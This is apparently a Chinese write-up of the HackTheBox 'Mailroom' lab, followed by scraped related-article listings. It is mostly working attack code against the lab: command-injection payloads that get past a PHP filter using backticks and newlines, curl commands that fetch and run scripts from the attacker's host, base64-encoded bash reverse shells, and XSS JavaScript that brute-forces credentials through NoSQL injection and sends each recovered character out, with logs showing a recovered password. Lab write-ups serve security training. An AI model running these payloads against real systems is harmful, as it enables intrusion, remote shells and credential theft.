/usr/bin/rm -rf /tmp/*# Clear past emails
echo "$(tail -n 10 /var/mail/tristan)" > /var/mail/tristan
root@mailroom:~# crontab  -l
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h  dom mon dow   command
*/3 * * * * /root/cleanup.sh >/dev/null 2>&1
*/1 * * * * /root/kpcli.sh >/dev/null 2>&1
root@mailroom:~#

看一下这台虚拟机靶机性能咋样:

root@mailroom:/tmp# df -h
Filesystem                         Size  Used Avail Use% Mounted on
udev                               1.9G     0  1.9G   0% /dev
tmpfs                              391M   41M  350M  11% /run
/dev/mapper/ubuntu--vg-ubuntu--lv  7.2G  5.4G  1.5G  79% /
tmpfs                              2.0G     0  2.0G   0% /dev/shm
tmpfs                              5.0M     0  5.0M   0% /run/lock
tmpfs                              2.0G     0  2.0G   0% /sys/fs/cgroup
/dev/sda2                          219M  108M   93M  54% /boot
overlay                            7.2G  5.4G  1.5G  79% /var/lib/docker/overlay2/68f15147525c63cc344606e5b29fc4ec921f656f55260b4600bc178cb459378a/merged
overlay                            7.2G  5.4G  1.5G  79% /var/lib/docker/overlay2/f029f39ea36301cfff86726028ab27e9734acd9199aee23fc6bae7334b411020/merged
shm                                 64M  1.1M   63M   2% /var/lib/docker/containers/a792a1685ae42e12a2e997b16ba6e2d3bd8eb2fb9009379ed9aea1b2f087881a/mounts/shm
shm                                 64M     0   64M   0% /var/lib/docker/containers/178ce6c64a6be27a55a5dbb37dde1d2786c6e610c78e36c911e159dee2573f1c/mounts/shm
overlay                            7.2G  5.4G  1.5G  79% /var/lib/docker/overlay2/0bd824ad9f75604012958f36946a505389003d86fca4aeebafee5633ed3cf974/merged
shm                                 64M     0   64M   0% /var/lib/docker/containers/be13e7868b6371a6be9a28388202b131848556634f13b20060263e1571460ca3/mounts/shm
overlay                            7.2G  5.4G  1.5G  79% /var/lib/docker/overlay2/15152d7d89f89bb8394707d53a1787872a40454a4d6b656724f11167ca53b6e5/merged
shm                                 64M     0   64M   0% /var/lib/docker/containers/ed9dafc5f146dd54611d8e00e4f8cf5a302418effcf64de39f628f9c50599600/mounts/shm
tmpfs                              391M     0  391M   0% /run/user/1000
tmpfs                              391M     0  391M   0% /run/user/0
tmpfs                              391M     0  391M   0% /run/user/1001
root@mailroom:/tmp# free -mtotal        used        free      shared  buff/cache   available
Mem:           3901         600        1439          56        1860        2953
Swap:          2047           0        2047
root@mailroom:/tmp#

获取http://staff-review-panel.mailroom.htb/inspect.php源码:

docker cp containers_sites_1:/var/www/staffroom/inspect.php /home/scp -P 40022 -o StrictHostKeyChecking=no /home/inspect.php root@10.10.14.37:/tmp/

删除了html代码后,如下:

<?php
session_start(); // Start a session
// Check if authorized
if (!isset($_SESSION['logged_in']) || $_SESSION['logged_in'] !== true) {header('Location: index.php'); // The user is NOT logged in, redirect back to the login pageexit;
}$data = '';
if (isset($_POST['inquiry_id'])) {$inquiryId = preg_replace('/[\$<>;|&{}\(\)\[\]\'\"]/', '', $_POST['inquiry_id']);$contents = shell_exec("cat /var/www/mailroom/inquiries/$inquiryId.html");// Parse the data between  and </p>$start = strpos($contents, '<p class="lead mb-0">');if ($start === false) {// Data not found$data = 'Inquiry contents parsing failed';} else {$end = strpos($contents, '</p>', $start);$data = htmlspecialchars(substr($contents, $start + 21, $end - $start - 21));}
}$status_data = '';
if (isset($_POST['status_id'])) {$inquiryId = preg_replace('/[\$<>;|&{}\(\)\[\]\'\"]/', '', $_POST['status_id']);$contents = shell_exec("cat /var/www/mailroom/inquiries/$inquiryId.html");// Parse the data between  and </p>$start = strpos($contents, '<p class="lead mb-1">');if ($start === false) {// Data not found$status_data = 'Inquiry contents parsing failed';} else {$end = strpos($contents, '</p>', $start);$status_data = htmlspecialchars(substr($contents, $start + 21, $end - $start - 21));}
}?> <?php echo $_SESSION['name']; ?> <?php echo $data; ?> <?php echo $status_data; ?>

有session效验,关键两句代码如下:

$inquiryId = preg_replace('/[\$<>;|&{}\(\)\[\]\'\"]/', '', $_POST['inquiry_id']);
$contents = shell_exec("cat /var/www/mailroom/inquiries/$inquiryId.html");

源视频里需要先curl下载文件到/tmp目录下,然后bash调用执行,我想了个笨办法,只需一步执行:

r0的内容是:


myip2=$(  ip addr show tun0 |grep -Po '(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[1-9])(\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)){3}' |head -n 1);cat <<EOF>/tmp/r0.sh
id;
touch /tmp/XYZ;
setsid nc -lnvvp  10080&
bash -i >& /dev/tcp/$myip2/88 0>&1
EOFcat /tmp/r0.sh;

`sleep 2``curl -o /tmp/AA5 http:///10.10.14.37:77/r0.sh``bash /tmp/AA5``echo 1`

curl -v -d "inquiry_id=\`sleep+2\`\`curl+-o+/tmp/1r2+http://10.10.14.37:77/r0.sh\`\`bash+/tmp/1r2\`\`echo+1\`" -H "Cookie: PHPSESSID=5539dfbf91caa882aa3368627bf56878" http://staff-review-panel.mailroom.htb/inspect.php

容器里的nc不支持-e选项,只能开一个正向telnet后门,无法建立反弹shell.

root@ed9dafc5f146:/var/www/html# which nc
/bin/nc
root@ed9dafc5f146:/var/www/html#
root@ed9dafc5f146:/var/www/html# nc -e
nc: invalid option -- 'e'
usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-M ttl][-m minttl] [-O length] [-P proxy_username] [-p source_port][-q seconds] [-s sourceaddr] [-T keyword] [-V rtable] [-W recvlimit][-w timeout] [-X proxy_protocol] [-x proxy_address[:port]][destination] [port]
root@ed9dafc5f146:/var/www/html## nc  10.10.14.37  88 -e /bin/sh

由于没有过滤回车,我们还可以利用回车来进行多语句执行:


curl -v --data-binary "inquiry_id=\`sleep+12
curl+-o+/tmp/3r2+http://10.10.14.37:77/r0.sh
bash+/tmp/3r2
echo+-n+1\`" -H "Cookie: PHPSESSID=5539dfbf91caa882aa3368627bf56878" \
http://staff-review-panel.mailroom.htb/inspect.php

如下方案反弹shell失败,原因不明:

提交参数:

`  ``curl http://127.0.0.1:77/r2.sh``  `#  shell_exec("$inquiryId");
# 如上就可以# 如下就不行
#  shell_exec("cat $inquiryId");curl -v -d "inquiry_id=\`+\`\`curl+http://10.10.14.37:77/r2.sh\`\`+\`" \
-H "Cookie: PHPSESSID=5539dfbf91caa882aa3368627bf56878" \
http://staff-review-panel.mailroom.htb/inspect.php

r1.sh的内容是:

myip2=$(ip addr show tun0 |grep -Po '(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[1-9])(\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)){3}' |head -n 1);cat <<EOF>/tmp/r1.sh
bash -i >& /dev/tcp/$myip2/88 0>&1
EOFcat /tmp/r1.sh;

r2.sh的内容是:

myip2=$(ip addr show tun0 |grep -Po '(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[1-9])(\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)){3}' |head -n 1);cat <<EOF>/tmp/r2.sh
bash -c {curl,http://$myip2:77/r1.sh}|bash
EOFcat /tmp/r2.sh;

结合之前的回车换行来运行多语句,想出来另外一个思路:

不需要写文件,直接多语句执行:

先在本地kali上生成r8.sh文件:

myip2=$(ip addr show tun0 |grep -Po '(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[1-9])(\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)){3}' |head -n 1);w2=`echo "bash -i >& /dev/tcp/$myip2/88 0>&1"|base64`
echo $w2;
echo $w2|base64 -d;cat <<EOF>/tmp/r8.sh
bash -c {echo,$w2}|{base64,-d}|{bash,-i}
EOFcat /tmp/r8.sh;

然后在ssh tristan@10.10.11.209 后发起curl请求:

curl -v -d "inquiry_id=../../../../proc/cpuinfo
\`+\`\`curl+http://10.10.14.50:30088/r8.sh\`\`+\`
touch+/tmp/" -H "Cookie: PHPSESSID=5539dfbf91caa882aa3368627bf56878"  \
http://staff-review-panel.mailroom.htb/inspect.php

成功反弹shell.

小技巧:

xss破解用户名和密码的时候,如何延迟超过30秒?

经过测试靶机里的火狐浏览器,没有阻止open函数弹窗,可以通过这个方法来延时,甚至可以多开很多浏览器页面,使用kali做反向代理连接互联网网站.

curl -v -d 'email=qax%40gmail.com&title=maga2023&message=<script+src%3d"http%3a//10.10.14.50:30088/loader_user.js"></script><script+src%3d"http%3a//10.10.14.50:8090/?c=123"></script>'   http://mailroom.htb/contact.php

更新php的index.php:

echo "<?php header('Content-Type: application/x-javascript; charset=UTF-8');\
header('Access-Control-Allow-Origin: *');\
header('Access-Control-Allow-Headers: *');\
set_time_limit(300);sleep(120);\
echo 'console.log(120);';">/tmp/index.php ;

loader_user.js的源码:

function dateTimeToStringS(date, format) {if (date) {var o = {"M+": date.getMonth() + 1, // "d+": date.getDate(), //            "h+": date.getHours() % 12 == 0 ? 12 : date.getHours() % 12,  "H+": date.getHours(), // "m+": date.getMinutes(), // "s+": date.getSeconds(), // "q+": Math.floor((date.getMonth() + 3) / 3),  "S": date.getMilliseconds() // ms           };var week = {"0": "\u65e5","1": "\u4e00","2": "\u4e8c","3": "\u4e09","4": "\u56db","5": "\u4e94","6": "\u516d"};if (/(y+)/.test(format)) {format = format.replace(RegExp.$1, (date.getFullYear() + "").substr(4 - RegExp.$1.length));}if (/(E+)/.test(format)) {format = format.replace(RegExp.$1, ((RegExp.$1.length > 1) ? (RegExp.$1.length > 2 ? "\u661f\u671f" : "\u5468") : "") + week[date.getDay() + ""]);}for (var k in o) {if (new RegExp("(" + k + ")").test(format)) {format = format.replace(RegExp.$1, (RegExp.$1.length == 1) ? (o[k]) : (("00" + o[k]).substr(("" + o[k]).length)));}}return format;}
}window.onunload=function()
{
fetch("http://10.10.14.50:30088/guess_username.js?fetch_unload_t="+dateTimeToStringS(new Date(),"yyyy-MM-dd-HH:mm:ss.S")  );
}window.onbeforeunload=function()
{
fetch("http://10.10.14.50:30088/guess_username.js?fetch_beforeunload_t="+dateTimeToStringS(new Date(),"yyyy-MM-dd-HH:mm:ss.S")  );
}fetch("http://10.10.14.50:30088/guess_username.js?fetch_first_t="+dateTimeToStringS(new Date(),"yyyy-MM-dd-HH:mm:ss.S")  );
setTimeout(function(){window.open("http://10.10.14.50:30088/loader_html.html?time="+dateTimeToStringS(new Date(),"yyyy-MM-dd-HH:mm:ss.S")  );},10000);setTimeout(function(){
opener=null;
open('','_self');
close();
},60000);
//driver.set_page_load_timeout(30); 30秒后就关闭了(python ai.py进程结束),等不到60秒

loader_html.html的源码如下:

<!DOCTYPE html>
<html lang="en"><head><title>guess_username</title></head><body><script src='http://10.10.14.50:30088/guess_username.js'></script><script src='http://10.10.14.50:30088/guess_password.js'></script></body>
</html>

更新后的guess_username.js 源码:

/*
fetch("http://10.10.14.50:30088/xss.js?gu="+100*Math.random()).then(
(res3)=>{    var t2=res3.text();t2.then(   ( y3)=>{//console.log(y3);eval( y3 ) ; });//console.log(res3,t2);return t2; }
);
*/async function callAuth(mail) {var http = new XMLHttpRequest();http.open('POST', "http://staff-review-panel.mailroom.htb/auth.php", true);http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');http.onload = function () {if (/"success":true/.test(this.responseText)) {notify(mail);cal("0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%'()+, -/:;<=>@[\]_`{}~", mail);}};http.send("email[$regex]=.*" + mail + "@mailroom.htb&password[$ne]=abc");
}
function notify(mail) {fetch("http://10.10.14.50:30088/r8.sh?" + mail);
}
function cal(chars, mail) {for (var i = 0; i < chars.length; i++) {callAuth(chars[i] + mail)}
}
var chars88 = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%'()+, -/:;<=>@[\]_`{}~";
cal(chars88, "")console.log("5201314_maga");
fetch("http://10.10.14.50:30088/guess_username.js?in_fetch_guest_username.js="+100*Math.random());window.onunload=function()
{
fetch("http://10.10.14.50:30088/guess_username.js?fetch_unload_ut="+100*Math.random());
}window.onbeforeunload=function()
{
fetch("http://10.10.14.50:30088/guess_username.js?fetch_beforeunload_ut="+100*Math.random()  );
}setTimeout(function(){
opener=null;
open('','_self');
close();
},60000);// 60秒后关闭,整个firefox-esr进程终结

[2023-05-03T12:03:31.693Z]  "GET /loader_user.js" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[Wed May  3 12:03:31 2023] 10.10.11.209:39216 Accepted
[2023-05-03T12:03:31.861Z]  "GET /guess_username.js?fetch_first_t=2023-05-03-12:03:30.634" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:41.920Z]  "GET /loader_html.html?time=2023-05-03-12:03:40.638" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:42.036Z]  "GET /guess_username.js" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:42.111Z]  "GET /guess_password.js" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:43.195Z]  "GET /guess_username.js?in_fetch_guest_username.js=32.70788844267638" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:43.572Z]  "GET /guess_password.js?6" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:44.285Z]  "GET /guess_password.js?69" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:45.954Z]  "GET /guess_password.js?69t" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:46.869Z]  "GET /guess_password.js?69tr" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:48.451Z]  "GET /guess_password.js?69tri" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:50.510Z]  "GET /guess_password.js?69tris" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:52.582Z]  "GET /r8.sh?n" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:53.417Z]  "GET /guess_password.js?69trisR" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:55.632Z]  "GET /r8.sh?an" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:57.588Z]  "GET /guess_password.js?69trisRu" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:59.363Z]  "GET /r8.sh?tan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:01.129Z]  "GET /guess_password.js?69trisRul" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:02.564Z]  "GET /r8.sh?stan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:04.469Z]  "GET /guess_password.js?69trisRule" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:06.678Z]  "GET /r8.sh?istan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:08.018Z]  "GET /guess_password.js?69trisRulez" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:09.113Z]  "GET /r8.sh?ristan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:09.905Z]  "GET /guess_password.js?69trisRulez!" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:11.824Z]  "GET /r8.sh?tristan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:13.160Z]  "GET /favicon.ico" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[Wed May  3 12:05:31 2023] 10.10.11.209:39216 [200]: GET /?c=123
[Wed May  3 12:05:31 2023] 10.10.11.209:39216 Closing

目前git操作不熟:

root@3ae5bc817f72:/etc/apache2/sites-enabled# ls -al
total 8
drwxr-xr-x 1 root root 4096 Jan 17 19:56 .
drwxr-xr-x 1 root root 4096 Nov 15 04:17 ..
lrwxrwxrwx 1 root root   36 Jan 17 19:56 000-mailroom.conf -> ../sites-available/000-mailroom.conf
lrwxrwxrwx 1 root root   37 Jan 17 19:56 001-staffroom.conf -> ../sites-available/001-staffroom.conf
lrwxrwxrwx 1 root root   33 Jan 17 19:56 002-gitea.conf -> ../sites-available/002-gitea.conf
root@3ae5bc817f72:/etc/apache2/sites-enabled# cat 000-mailroom.conf
<VirtualHost *:80>ServerName mailroom.htb# Block access to template directory<Directory /var/www/mailroom/template>Require all denied</Directory># Hide git directoryRedirectMatch 404 /\.git# DocumentRootDocumentRoot /var/www/mailroom
</VirtualHost>
root@3ae5bc817f72:/etc/apache2/sites-enabled# root@3ae5bc817f72:/etc/apache2/sites-enabled# cat 001-staffroom.conf
<VirtualHost *:80>ServerName staff-review-panel.mailroom.htb# Allow CORSHeader set Access-Control-Allow-Origin "*"# Block connections from outside localhost<Directory />Allow from 127.0.0.1Allow from 172.19.0.1Deny from all</Directory># Hide git directoryRedirectMatch 404 /\.git# DocumentRootDocumentRoot /var/www/staffroom
</VirtualHost>
root@3ae5bc817f72:/etc/apache2/sites-enabled#
root@3ae5bc817f72:/etc/apache2/sites-enabled#
root@3ae5bc817f72:/etc/apache2/sites-enabled# cat 002-gitea.conf
<VirtualHost *:80>ServerName git.mailroom.htb# Access to gitea dockerProxyPass / http://gitea:3000/ProxyPassReverse / http://gitea:3000/</VirtualHost>
root@3ae5bc817f72:/etc/apache2/sites-enabled#

hackthebox Mailroom Hard难度抄wp复现相关推荐

AI绘画第二步，抄作业复现超赞的效果！
上一篇,讲了如何安装AI绘画软件,但是装完后发现生成效果很渣!而网上那些效果都很赞.真的是理想很丰满,现实很骨感. 今天就是来聊聊如何抄作业,最大程度的还原那些超赞的效果.换一种说法就是,教大家如何使 ...
青少年CTF-弱口令实验室招新赛部分wp复现步骤
前言:本人CTF小白,写的不好的地方多多批评. Misc部分 ScanQR 打开附件,得到一张图片,但是用工具扫不出来什么这题考察的是汉信码,找个在线工具扫描得到网盘地址里面得到base64字符, ...
hackthebox Busqueda EASY难度一把梭哈
自动执行sudo命令,自动给sudo命令输入密码:jh1usoih2bkjaspwe92 curl -v -d "engine=Accuweather&query=1'%2bprin ...
[ctf misc][wp]一些内存取证的wp（含[2021蓝帽杯北部赛区分区赛]博人的文件）
wp 1.[V&N2020 公开赛]内存取证 1.找策略 volatility.exe -f C:\Users\shen\Downloads\mem.raw imageinfo 2.看进程 v ...
祥云杯-re复现（未完待续）
周末祥云杯没打,主要是自己想摸了..(就是这么直白)还有就是nctf举办,我出题,我到比赛那天还没出完...(太咕了..) 比赛后就想来复现这比赛,看解题人数,感觉满难的,应该很有质量,就跟着null ...
菜狗杯Misc一层一层一层地剥开我的♥wp
目录一.原题二.解题步骤对jpg图片的处理对文件名是一个心形的数据文件的处理 base100解码这题完全是看着官方wp复现的,感觉涉及的步骤比较多但每一步本身不难,多记录一遍加深印象. 一. ...
NKCTF2023 pwn wp
序姗姗来迟-我是蓝狗.从这场比赛中学到了许多新知识,所以记录一下. ezshellcode 能输入 0x100 字节的任意指令执行,很明显直接丢个 shellcode 进去就行了. 问题是程序不是从 ...
ctfshow渔人杯2021 部分WP
图片较多,手机加载较慢 python写的及其拉胯,所以请见谅(是真的拉胯) 解题用的方法都是笨方法,大家知道怎么做了之后可以找简单的方法已解题:签到抽奖.神仙姐姐.飘啊飘.感受下气氛.我跟你拼了.套 ...
2020第十一届极客大挑战——Geek Challenge部分wp
好吧好吧,这几天的比赛太多了,这个比赛题上的有点慢,只在打其他比赛的间隙打了两天的极客大挑战,现在回来填下坑吧. 就从最简单的MISC开始好了,简答题就简单写了. MISC1-一"页&quo ...

hackthebox Mailroom Hard难度抄wp复现

hackthebox Mailroom Hard难度抄wp复现相关推荐

最新文章

热门文章

hackthebox Mailroom Hard难度 抄wp复现

hackthebox Mailroom Hard难度 抄wp复现相关推荐

最新文章

热门文章

hackthebox Mailroom Hard难度抄wp复现

hackthebox Mailroom Hard难度抄wp复现相关推荐